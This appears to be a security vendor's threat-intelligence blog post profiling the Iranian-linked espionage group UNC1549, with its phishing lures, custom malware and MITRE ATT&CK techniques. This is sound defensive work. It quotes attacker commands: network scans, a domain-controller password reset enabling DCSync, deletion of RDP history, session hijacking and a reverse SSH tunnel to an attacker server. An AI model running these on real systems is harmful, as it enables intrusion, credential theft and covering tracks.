Overview

UNC1549 is an Iranian-linked cyber-espionage group active since at least June 2022. It targets aerospace, aviation, and defense organizations across the Middle East, South Asia, and Western Europe. The group deploys custom malware, uses fake React-based career portals to deliver multi-stage payloads, and exfiltrates data over encrypted C2 channels.

Known Aliases

• Nimbus Manticore
• Smoke Sandstorm

Associated Malware or Tools

• MiniJunk (persistent backdoor)
• MiniBrowse (browser credential stealer)
• SIGHTGRAB (screenshot capture utility)
• TRUSTRAP (fake authentication window for credential harvesting)

Techniques and TTPs (Mitre ATT&CK Mapping)

• T1566.002 Phishing: Spearphishing Link
• T1059.001 Command and Scripting Interpreter: PowerShell
• T1059.003 Command and Scripting Interpreter: Windows Command Shell
• T1053.005 Scheduled Task/Job: Scheduled Task
• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1027 Obfuscated Files or Information
• T1027.001 Obfuscated Files or Information: Binary Padding
• T1036 Masquerading
• T1070.001 Indicator Removal: Clear Windows Event Logs
• T1574.001 Hijack Execution Flow: DLL Search Order Hijacking
• T1003.006 OS Credential Dumping: DCSync
• T1555.003 Credentials from Password Stores: Credentials from Web Browsers
• T1087.002 Account Discovery: Domain Account
• T1021.001 Remote Services: Remote Desktop Protocol
• T1113 Screen Capture
• T1572 Protocol Tunneling
• T1041 Exfiltration Over C2 Channel

Detection and Prevention

Key Takeaways

• UNC1549 is an Iranian-linked threat group, also known as Nimbus Manticore and Smoke Sandstorm, targeting aerospace, aviation, and defense organizations since at least June 2022.
• The group runs spear-phishing campaigns using fake career portals that mimic companies like Boeing, Airbus, and Teledyne FLIR. Victims receive unique login credentials and are prompted to download malicious archives that deliver multi-stage malware.
• UNC1549 deploys four custom tools: MiniJunk (backdoor), MiniBrowse (browser credential stealer), SIGHTGRAB (screenshot capture), and TRUSTRAP (fake authentication window for credential harvesting).
• By late 2023, the group expanded beyond its initial targets in Israel, UAE, Turkey, India, and Albania to the worldwide aerospace and defense supply chain. In September 2025, operations extended into Portugal, Sweden, and Denmark.
• The Picus Security Validation Platform includes a dedicated threat simulation for UNC1549 (Threat ID 74718) under the Windows Endpoint attack module, providing actionable mitigation insights based on real attack behaviors.

UNC1549 is an Iranian-linked threat group that has been running targeted operations since at least June 2022. The group focuses on aerospace, aviation, and defense organizations across Israel, the UAE, Turkey, India, and Albania.

By late 2023, UNC1549 expanded its focus to the worldwide aerospace and defense supply chain, running highly tailored intelligence-gathering operations that lasted through October 2025. In September 2025, the group shifted geographically into Western Europe, targeting organizations in Portugal, Sweden, and Denmark.

Their operations are highly targeted and include the creation of false career sites that mimic well-known entities such as Boeing, Airbus, and Teledyne FLIR. They then send spear phishing emails with login information for the false career sites and use the information obtained to drop multi-stage malware and collect information through an encrypted channel.

This blog breaks down their tactics, techniques, and procedures using the MITRE ATT&CK framework. At the end, we will explain how Picus helps you against this threat actor.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the UNC1549?

June 2022 (at least) – UNC1549 begins operations targeting aerospace, aviation, and defense organizations in Israel, the UAE, and potentially Turkey, India, and Albania [1].

Late 2023 - October 2025 – Highly tailored intelligence gathering operations were launched, targeting the worldwide aerospace/defense supply chain [2].

September 2025 –  A significant strategic operational expansion was conducted by UNC1549, targeting Western Europe, including Portugal, Sweden, and Denmark. This operation heavily utilized false career portals and malicious recruitment lures, resulting in heavily obfuscated, multi-stage malware, including MiniJunk backdoor and MiniBrowse credential stealer [3].

Which MITRE ATT&CK Techniques Are Used by UNC1549?

Tactic: Initial Access

T1566.002 Phishing: Spearphishing Link

The group sent targeted spear-phishing emails with links to fake, React-based career portals. These portals mimicked prominent aerospace and defense companies such as Boeing, Airbus, and Teledyne FLIR.

Victims received unique credentials to log into these portals. The portals then prompted victims to download malicious archives.

Here is an example of the malicious emails [2]:

HiAccording to the arrangements we made, your profile information has been sent. Use them and follow the instructions to complete the hiring procedure and receive the JD
After that, we will talk about the interview date.

mps teledyneflir.com.de/careers/auth

Username: 
Password: 

Tetyana Pidkovych
Human Resource Specialist
Teledyne FLIR
Berlin, Germany
tetyana.pidkovych@teledyneflir.com.de

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell scripts were executed to conduct internal network reconnaissance, specifically for port scanning and pinging subnets associated with IT administrators.

Example conceptual commands are given below:

# Ping Sweeping
1..254 | ForEach-Object { if (Test-Connection -ComputerName "192.168.1.$_" -Count 1 -Quiet) { "192.168.1.$_ is up" } }

# Port Scanning
80,443,445,3389 | ForEach-Object { $t = New-Object Net.Sockets.TcpClient; try { $t.Connect("192.168.1.100",$_); "$_ OPEN" } catch { "$_ CLOSED" } }

Additionally, obfuscated Invoke-Kerberoast scripts were run for credential theft [2].

T1059.003 Command and Scripting Interpreter: Windows Command Shell

UNC1549 relied on the Windows command shell to execute built-in administrative tools like net.exe for enumerating Active Directory objects and resetting computer account passwords [2].

net user DC-01$ P@ssword

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

During the infection sequence, the malware loader created scheduled tasks. These tasks forced the execution of a benign host file (MigAutoPlay.exe) and its sideloaded malicious DLL (userenv.dll) from a newly created working directory [3].

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

UNC1549 wrote to the Windows Registry Run keys to force the malware to execute automatically at user logon. Different backdoor versions used different registry paths. Some mimicked OneDrive or image viewers.

# Variant 1
Key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive FileCoAuth
Value: %LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll

# Variant 2
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveCoUpdate
Value: %LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

UNC1549 applied heavy, compiler-level code obfuscation to their malware. This included complex branch structures, opaque predicates, individually encrypted strings, and obfuscated API function calls. The goal was to block reverse engineering and evade endpoint detection.

T1027.001 Obfuscated Files or Information: Binary Padding

The actor inflated the file size of their compiled malware by inserting large blocks of inert junk code. This exploited the size limitations of many antivirus scanning engines, causing them to truncate deep analysis and miss the payload.

T1036 Masquerading

The group named their malicious files after legitimate services like OneDrive. (e.g., OneDriveFileCoAuth.exe)

They displayed fake graphical interfaces, such as false error messages about network connectivity, to hide the backdoor's setup process.

# Fake Graphical Interface
Connection Lost
Error connecting to survey. Please check your internet connection.

They also used lures tied to current events to disguise payloads.

T1070.001 Indicator Removal: Clear Windows Event Logs

The attackers erased traces of lateral movement by directly modifying the registry to delete RDP connection history keys [2].

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

T1574.001 Hijack Execution Flow: DLL Search Order Hijacking

The threat actor planted malicious DLLs alongside legitimate executables (like Microsoft, Citrix, VMware, or FortiGate binaries) or abused undocumented low-level API calls (RtlCreateProcessParameters) to manipulate the DllPath, forcing a legitimate process to sideload the malware.

Tactic: Credential Access

T1003.006 OS Credential Dumping: DCSync

UNC1549 performed DCSync attacks, using a modified utility derived from Mimikatz.

A DCSync attack lets an attacker steal password hashes from Active Directory. The attacker impersonates a DC and requests credential data through a legitimate replication protocol.

Active Directory uses the MS-DRSR protocol to keep Domain Controllers in sync. Attackers abuse this process.

But to use this technique, the attacker first needs to compromise an account with replication rights. UNC1549 ran net user <computer_name> <password> to reset a domain controller's computer account password in Active Directory. Since DC computer accounts hold replication rights by default, the attacker then used those credentials to execute a DCSync attack.

After the execution, they extracted NTLM hashes directly from compromised domain controllers [2].

T1555.003 Credentials from Password Stores: Credentials from Web Browsers

The group deployed a specialized stealer component, MiniBrowse, to extract saved credentials from web browsers. One variant stole Chrome credentials. Another was injected directly into browsers to intercept login information and exfiltrate Edge login data. Both were DLLs, injected into browsers [3].

Additionally, TRUSTRAP malware displayed a fake authentication window to capture credentials in clear text [2].

Tactic: Discovery

T1087.002 Account Discovery: Domain Account

The group ran standard Windows command-line tools to enumerate Active Directory user accounts and map group memberships. Example commands that might be run are shown below:

# ​​Enumerate domain users
net user /domain# List all domain groupsnet group /domain

# Take a snapshot of AD
ADExplorer.exe -snapshot "" output.dat

Tactic: Lateral Movement

UNC1549 relied heavily on RDP for lateral movement. They also performed RDP session hijacking by identifying active user sessions and connecting to them. This gave them access to active, unlocked browser windows.

The following commands might be run to hijack sessions:

# Enumerate Active Sessions
query session
# Hijack the Target Session
tscon  /dest:

Tactic: Collection

T1113 Screen Capture

UNC1549 deployed a custom utility (SIGHTGRAB) that periodically captured screenshots of the victim's active display at regular intervals. The images were saved incrementally to local directories, as shown in the example below [2].

C:\Users\Public\Videos\2025-3-7-10-17\1.jpg C:\Users\Public\Videos\2025-3-7-10-17\2.jpg C:\Users\Public\Videos\2025-3-7-10-17\3.jpg

Tactic: Command and Control

T1572 Protocol Tunneling

To bypass host-based security telemetry, the attackers established reverse SSH tunnels from compromised internal systems back to their command servers [2].

This encrypted exfiltration traffic and administrative communications.

C:\windows\system32\openssh\ssh.exe [Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070

-R flag: Reverse tunnel flag (with the port value 1070)-N flag: Stops a remote shell from spawningThink of -N Flag as: "connect but don't do anything except keep the tunnel alive." It is used not to leave a visible footprint.

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

UNC1549 exfiltrated stolen data directly over the established HTTPS command and control channel to an attacker-controlled cloud infrastructure. This included harvested browser credentials and files.

The following shows some HTTP headers from the MiniBrowse’s exfiltration process [2]:

Content-Disposition: form-data; name="file"; filename="edgeLog.txt"\r\n
Content-Type: application/octet-stream\r\n\r\n

How Picus Simulates UNC1549 Attacks?

We also strongly suggest simulating UNC1549 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for UNC1549:

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the UNC1549 Group?

UNC1549 is also known as: Nimbus Manticore, Smoke Sandstorm.

References

[1]        “When Cats Fly: Suspected Iranian Threat Actor UNC1549 Targets Israeli and Middle East Aerospace and Defense Sectors,” Google Cloud Blog. Accessed: Mar. 27, 2026. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/suspected-iranian-unc1549-targets-israel-middle-east

[2]        “Frontline Intelligence: Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem,” Google Cloud Blog. Accessed: Mar. 26, 2026. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/analysis-of-unc1549-ttps-targeting-aerospace-defense

[3]        “Nimbus Manticore Deploys New Malware Targeting Europe,” Check Point Research. Accessed: Mar. 26, 2026. [Online]. Available: https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/

FAQ

Q: What is UNC1549?

A: UNC1549 is an Iranian-linked threat group active since at least June 2022. The group targets aerospace, aviation, and defense organizations across Israel, the UAE, Turkey, India, Albania, and, as of September 2025, Western Europe. The group is also known as Nimbus Manticore and Smoke Sandstorm.

Q: Which industries and countries does UNC1549 target?

A: UNC1549 focuses on aerospace, aviation, and defense organizations. Initial targets included Israel, the UAE, Turkey, India, and Albania. By late 2023, the group expanded to the worldwide aerospace and defense supply chain. In September 2025, UNC1549 extended operations into Portugal, Sweden, and Denmark.

Q: How does UNC1549 gain initial access to victim systems?

A: UNC1549 sends spear-phishing emails with links to fake, React-based career portals. These portals mimic well-known companies such as Boeing, Airbus, and Teledyne FLIR. Victims receive unique login credentials and are prompted to download malicious archives, which deliver multi-stage malware onto their systems.

Q: What malware and tools does UNC1549 use?

A: UNC1549 deploys several custom tools. MiniJunk is a backdoor used for persistent access. MiniBrowse is a credential stealer that targets saved browser data from Chrome and Edge. SIGHTGRAB captures periodic screenshots of the victim's screen. TRUSTRAP displays fake authentication windows to collect credentials in clear text.

Q: How does UNC1549 avoid detection?

A: UNC1549 uses heavy compiler-level code obfuscation, including encrypted strings and opaque predicates. The group inflates malware file sizes with junk code to bypass antivirus scanning limits. Malicious files are named after legitimate services like OneDrive. The group also erases RDP connection history from the Windows Registry to remove traces of lateral movement.

Q: How does Picus help organizations defend against UNC1549?

A: Picus simulates UNC1549 attack techniques through the Picus Security Validation Platform. The Picus Threat Library includes a dedicated threat simulation for UNC1549 (Threat ID 74718) under the Windows Endpoint attack module. Organizations get actionable mitigation insights based on real attack behaviors. A 14-day free trial of the Picus Security Validation Platform is available.